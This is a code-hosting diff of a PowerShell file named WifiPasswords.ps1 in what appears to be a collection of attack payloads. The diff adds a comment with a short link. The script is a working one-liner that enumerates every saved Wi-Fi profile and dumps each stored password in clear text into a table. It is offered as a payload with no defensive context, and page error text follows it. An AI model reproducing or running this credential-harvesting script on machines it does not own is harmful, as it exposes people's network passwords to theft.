🤬
  • ■ ■ ■ ■ ■ ■
    Payloads/Scripts/WifiPasswords.ps1
     1 +# https://jakoby.lol/n89
     2 + 
    1 3  (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String
    2 4   
Please wait...
Page is in error, reload to recover